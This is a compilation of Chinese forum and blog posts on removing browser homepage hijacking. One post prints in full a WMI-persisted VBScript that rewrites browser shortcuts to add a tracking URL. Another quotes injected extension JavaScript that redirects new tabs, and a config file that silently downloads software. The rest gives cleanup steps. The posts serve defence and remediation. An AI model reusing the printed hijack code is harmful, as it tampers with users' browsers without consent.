浏览器首页被某些网站劫持的解决办法
浏览器首页被某些网站劫持的解决办法
直接打开浏览器的执行程序没问题，也不会被什么网页给劫持，但是只要创建了任务栏的快捷方式之后，打开就会加载一些你没设定的主页
游客，如果您要查看本帖隐藏内容请
上面蓝色部分，是根据你自己的电脑用户名不同而不同的，自行修改！
我们这里没有广告，不会弹窗，只有素材、教程和资源，争取做到每个资源都能下载！
width:100%">
IE以及其他浏览器主页被劫持到/?kunown的解决办法
近日在网上相续看到有网友表示自己在下载使用了VeryCD下载链接查看器这款工具以后，再打开浏览器就被直接跳转到 /?kunown 这个导航页面了，而且打开多个浏览器：IE、Chrome、Firefox、Opera、Safari、Maxthon，均相同症状，检查浏览器首页设置——均正常！
最后发现，原来快速启动栏的IE浏览器快捷命令被其修改，修改后的类似如下图，于是认为就是普通的修改快捷方式，手工删除 2345 网址的部分，但半小时后再次被更改了。考虑到可能加载了启动项，在注册表、启动项、服务等中均未查找到相关信息，重启后IE快捷方式被重新篡改。尝试了事件查看器和任务计划，均未在里面查出任何信息。&&
01.jpg (110.2 KB, 下载次数: 0)
11:39 上传
IE快捷方式的命令被修改为/?kunown
之后又安装了超级兔子、360、exterminateit等工具进行检查，也未检出。
打开ProcessMonitor进行监视，发现每隔30分钟出现一个scrcons.exe进程自动启动并修改快速启动栏的命令，然后自动关闭（幸亏是30分钟一次，你要是24小时一次，那我就杯具了……），修改Win7下opera快速启动图标路径类似如下：
C:UsersiefansAppDataRoamingMicrosoftInternet ExplorerQuick LaunchUser PinnedTaskBarOpera12.01 1532.lnk
查找资料，发现这应该是一个通过WMI发起的定时自动运行脚本。要查看WMI事件，到以下地址下载WMITool并安装
/en-us/download/details.aspx?id=24045
安装后打开WMI event viewer，点击左上角register for events，弹出Connect to namespace框，填入“rootsubscription”，确定，出现下图：
02.png (33.74 KB, 下载次数: 0)
11:39 上传
打开 WMI event viewer 填入 rootsubscription
点击左侧_EventFilter:Name=&unown_filter&，再至右侧右键点击ActiveScriptEventConsume r Name=&unown&，选择view instant properties，如下图：
03.png (57.48 KB, 下载次数: 0)
11:39 上传
选择view instant properties
查看ScriptText项可知，这是一段VBScript调用系统服务间隔30分钟执行一次，将所有浏览器调用加上“/?kunown”！抓住你了~！隐藏的够深，没常驻进程，没有文件（把自己存储在WMI数据库中）。
受到影响的浏览器有（各色浏览器，差不多齐了）：
&IEXPLORE.EXE&, &chrome.exe&, &firefox.exe&, &360chrome.exe&, &360SE.exe&, &SogouExplorer.exe&, &opera.exe&, &Safari.exe&, &Maxthon.exe&, &TTraveler.exe&, &TheWorld.exe&, &baidubrowser.exe&, &liebao.exe&, &QQBrowser.exe&
具体代码如下：
On Error Resume Next:Const link = &/?kunown&:browsers = Array(&IEXPLORE.EXE&, &chrome.exe&, &firefox.exe&, &360chrome.exe&, &360SE.exe&, &SogouExplorer.exe&, &opera.exe&, &Safari.exe&, &Maxthon.exe&, &TTraveler.exe&, &TheWorld.exe&, &baidubrowser.exe&, &liebao.exe&, &QQBrowser.exe&):Set oDic = CreateObject(&scripting.dictionary&):For Each browser In browsers:oDic.Add LCase(browser), browser:Next:Set fso = CreateObject(&Scripting.Filesystemobject&):Set WshShell = CreateObject(&Wscript.Shell&):strDesktop = &C:UsersGeminiDesktop&:strAllUsersDesktop = WshShell.SpecialFolders(&AllUsersDesktop&):QuickLaunch = &C:UsersGeminiAppDataRoamingMicrosoftInternet ExplorerQuick Launch&:UserPinnedStartMenu = QuickLaunch & &User PinnedStartMenu&:UserPinnedTaskBar = QuickLaunch & &User PinnedTaskBar&:For Each file In fso.GetFolder(strDesktop).Files:If LCase(fso.GetExtensionName(file.Path)) = &lnk& Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & &.& & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:For Each file In fso.GetFolder(strAllUsersDesktop).Files:If LCase(fso.GetExtensionName(file.Path)) = &lnk& Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & &.& & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:If fso.FolderExists(QuickLaunch) Then:For Each file In fso.GetFolder(QuickLaunch).Files:If LCase(fso.GetExtensionName(file.Path)) = &lnk& Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & &.& & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:If fso.FolderExists(UserPinnedStartMenu) Then:For Each file In fso.GetFolder(UserPinnedStartMenu).Files:If LCase(fso.GetExtensionName(file.Path)) = &lnk& Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & &.& & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:If fso.FolderExists(UserPinnedTaskBar) Then:For Each file In fso.GetFolder(UserPinnedTaskBar).Files:If LCase(fso.GetExtensionName(file.Path)) = &lnk& Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & &.& & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If复制代码
最后，清除方法：在WMI event viewer中将“_EventFilter:Name=&unown_filter&”项目右键删除！
到WMITool安装路径（例如：C:Program Files (x86)WMI Tools）下，右键点击wbemeventviewer.exe，选择以管理员身份运行！删之！
还没完，还要手动将快速启动栏中，将各个浏览器快捷命令中的/?kunown去掉！
暂时就这么多了，还有没有其它影响的话，用用再看吧！
(4.75 MB, 下载次数: 0)
11:42 上传
点击文件名下载附件
我们这里没有广告，不会弹窗，只有素材、教程和资源，争取做到每个资源都能下载！
width:100%">
看这个老外写的帖子，英文的，貌似可以解决！
我们这里没有广告，不会弹窗，只有素材、教程和资源，争取做到每个资源都能下载！
width:100%">
width:100%">
& && && && && && && && && &&&围观！
width:100%">
可以看看喔~~我也被劫持了{:4_226:}{:4_226:}
width:100%">
沃日前段时间还解决了的
width:100%">
被劫持了好几种方法都没成功干脆重装了...
width:100%">
不定时的被劫持,已经被烦死了
width:100%">
这个怎么看啊
width:100%">
被支持讨厌死了,学习如何解决.
width:100%">
这个技术！厉害！
width:100%">
还不错，那看怎么样
width:100%">
中招了，前来求救 。。。
width:100%">
太多废话李弘基； uygpguh
width:100%">
是根据你自己的电脑用户名不同而不同的，自行修改
width:100%">
这个技术！厉害！
width:100%">
看一下图,我的也中招了,虽然和这个不一样
width:100%">
看看啊看看& &
width:100%">
学习学习再学习
width:100%">
贡献大于5000申请，满足条件自动颁发
站长推荐 /3
需要对应软件的教程、软件、插件、模板什么的，去对应软件的分区就可以看到了
再进去之后的帖子列表的上方，大家不要只看到论坛顶部快速通道里面的这么点点，呵呵！论坛里面的东西多的要死~~
Adobe公司的软件太多了，大家难免找的眼花缭乱的，我在这里把论坛发布过的整合一下，方便大家查找自己需要的
CS6之前的版本，都未标明win或者mac，基本上就是windows系统使用的，CS6的话，我把MAC版和WIN版详细的分开来了，下载自己需要的就OK了！
Digital Juice网站出品的东西，可以说是铺天盖地，源源不断，内容涵盖了视频素材、音频素材、平面素材、模板素材……这里我把我们论坛发布过的他们网站的东西呢，归集一下，方便大家查找下载！如果没有特别说明的话，论坛里面提供的都是完整的版本
首先要说的是，建议大家下载安装他们出品的专门的管理软件：JUICER
这个是目前最新的Juicer3.89d_Build270的链接，点这里去下载
我未必会在这个帖子进行实时更新的，以后大家可以在论坛搜索一下juicer，下载安装最新版的就可以了！越新的版本，支持的东西就越多！呵呵
Powered by：转载时请以超链接形式标明文章原始出处和作者信息及本声明
一、症状：IE，360极速浏览器，搜狗浏览器皆中招，表现为主页被修改为，创建新标签页被劫持为，另外还会后台静默下载安装软件，比如本次遇到的是下载uc浏览器，海阔阅读。为
了增加访问流量，采取浏览器劫持和不经过用户同意就下载软件的做法十分龌龊和无耻。谨慎怀疑是有第三方提供这种服务器，而2345，uc，海阔阅读等产品或者软件所在的公司为了拉流量
，付费给了这个流氓。二、解决方法：1.解决主页和下载的问题&找到C:\Documents and Settings\Administrator\Application Data\soft.ini（如果系统安装在其它分区请自行修改盘符），内容如下：&[config]version=
[soft1]url=/pcbrowser/down.php?pid=4125name=Browser_V4.0.3214.0_r_4125_(Build.exestatus=1rname=UCbrowser
[soft2]url=/qudao/hk/hkyl_yls_hklm.exename=hkyl_yls_hklm.exestatus=1rname=Haikuo
[link1]url=/?ico=http://jxxdownload.oss-cn-/ie.iconame=360安全浏览器
[link2]url=/?ico=http://jxxdownload.oss-cn-/ie.iconame=Internet Explorer
注：由于流氓会根据付费方不同和下三滥手段改进情况修改该配置文件，所以每个人碰到的内容可能不同。将该ini内容清空，来个釜底抽薪！
2.解决新建标签页被劫持
搜狗浏览器在C:\Documents and Settings\Administrator\Application Data\SogouExplorer\Extension路径下,使用windows提供的搜索查找，会在不同的目录下找到background.js，记事本打开后好会
发现脚本开头多了这样的几行，实现的功能就是在监听创建新标签页的事件，不管你设置成什么，都给你动态修改为/?这个地址，删除掉这几行脚本就不会再
跳转了。流氓的方法是基于我们的浏览器会自己安装一些扩展插件，这些插件会在浏览器启动时生效，流氓们就利用这个时机将实现他们的随意跳转。sogouExplorer.tabs.onCreated.addListener(function(tab)&{&&& if (tab.url == "se") &&&&&&& sogouExplorer.tabs.update(tab.id, {url: "/?"});&});
对于360浏览器也是同样的方法，在下面路径找到对应的内容删除掉。C:\Documents and Settings\Administrator\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions
chrome.tabs.onCreated.addListener(function(tab)&{&&& if (tab.url.indexOf("://newtab") != -1) &&&&&&& chrome.tabs.update(tab.id, {url: "/?"});&});
后续：后来发现上面的描述的方法治标不治本，经过反复追踪发现该木马藏身于explorer.exe,可以到网上找一个explorer的修复程序，修复之后再按照上面的方法删除掉那些恶意代码，包括桌面的浏览器快捷方式，重启，应该差不多就世界清静了。
历史上的今天：
blogbus_mLjY9845：ck：刚柔并济：小菜虫：：：：outnever：：：
访问统计：当前位置：
> 查看文章
浏览器主页被广告强制锁定劫持以及清理方法
某些流氓软件在用户毫不知情的前提下篡改浏览器主页，并且修改起来困难极大，让很多网友深恶痛绝。造成浏览器主页被锁定的原因绝大多数是因为滥用软件导致，经过笔者分析总结，一共有如下几种常见的锁定主页的方法，找到了根源便可解决问题。
首先，是一种初级的锁定方法。一般可以较容易的解决。例如修改IE工具栏、参数、组策略、注册表等。
IE工具栏：打开IE，“设置/Internet选项/常规/主页”，修改主页即可。
目标参数：在桌面IE图标上点击鼠标右键/属性，“目标(T)”中默认应该是：”C:\Program Files\Internet Explorer\iexplore.exe”，如果这段代码后面添加了网址，请删除！以及C:\Users\用户名\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch文件夹下的快捷方式属性中“目标(T)”如果有也要修改。
组策略：按“Windows+R”组合键，输入“gpedit.msc”即可打开组策略。点击左侧：“用户配置/管理模板/Windows组件/Internet Explorer”，双击右侧“禁用更改主页设置”，点击“已启用”，在主页栏填写需要设置的主页，点击“确定”即可。
注册表：运行“regedit”命令，打开注册表，如下条目下“Default_Page_URL”和“Start Page”值如果存在主页链接，删除即可。
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main
HKEY_ LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main
HKEY_USERS\Default\Software\Microsoft\Internet Explorer\Main
DNS劫持：网络运营商通过DNS劫持将浏览器跳转到流氓主页，这时我们可以通过修改DNS来进行屏蔽。
DNS简介及其一键切换工具DNS Jumper v1.0.6下载，DNS全称“Domain Name System”即域名系统，是网络上域名和IP地址进行相互映射的分布式数据库。更详细权威的介绍可参见百度百科。举例来说：为本站域名，然而访问网站时计算机需要的是网站的IP地址，这个由域名向IP地址转化的过程就是通过DNS来实现的。如果DNS服务器出现故障则无法上网；有些网络服务商进行DNS劫持，在浏览网页时强制性弹出广告；有 些网友还可能遇到上得了QQ而无法访问网页等一系列的问题。这些问题都围与DNS有关，因此在遇到这些问题时可以考虑切换DNS。（DNS地址可以平时收集一些，例如Google提供的 8.8.4.4）切换DNS可以在控制面板中进行修改，不过稍微显得麻烦。本文提供的这个小工具，只需要一键即可进行设置。此外，这个小工具提供了很多DNS服务器地址、可以进行DNS测速、清除DNS缓存（与浏览器缓存类似，为了加速域名解析）。
HOSTS文件劫持：通过修改“C:\Windows\System32\drivers\etc”下hosts文件进行网页跳转，将其中带有相关网页的那一行代码删除即可。
其次，是一种高级的篡改方法。例如通过WMI脚本劫持、驱动劫持等。如果是这种方法锁定的主页，普通用户很难通过简单的方法修改，必须找到根源。由于涉及的知识很多，无法展开介绍，这里提供一下思路，供有基础的朋友参考。我们可以通过进程监视工具ProcessMonitor或PCHunter等对系统进程进行密切监视，基本上就可以发现可疑进程。如果是通过WMI劫持，可用微软的WMI Tool工具将恶意代码删除；通常驱动劫持最为隐蔽，通过驱动程序将DLL注入进程进行劫持，这类问题也可以通过PCHunter等类似的 软件将其捕获，进行终止并删除，或使用病毒木马查杀类软件进行扫描，多数问题可以解决。
本文所涉及相关软件下载：
链接: /s/1hsdM27y 密码: h7dh
其他文章推荐
转载请注明来源：本文链接地址：
这家伙很懒，什么都没写！
你可能也喜欢
又一家网盘即将关闭服务360云盘服务转型公告
快手枪手快枪手
陆垚知马俐高清版网盘下载
老九门全篇百度网盘vip到点更新
&&&&1145&&
&&&&2918&&
&&&&2371&&
&&&&1230&&
&&&&2006&&
&&&&1656&&
&&&&2825&&
&&&&1204&&
&&&&131409&&
&&&&16073&&
&&&&23404&&
&&&&6466&&
&&&&29539&&
&&&&23944&&
&&&&12697&&
&&&&6763&&
&&&&6829&&
微信号：nichujian 或直接扫描二维码关注
本站无需注册，直接下载，如需评论直接填写即可。本站资料来于原创、购买和网上收集整理所得免费分享，版权属于原作者。仅进行学习测试之用，请在下载后24小时删除，如果无意之中侵犯了您的版权，请来信告知，本站将及时删除。邮箱 QQ: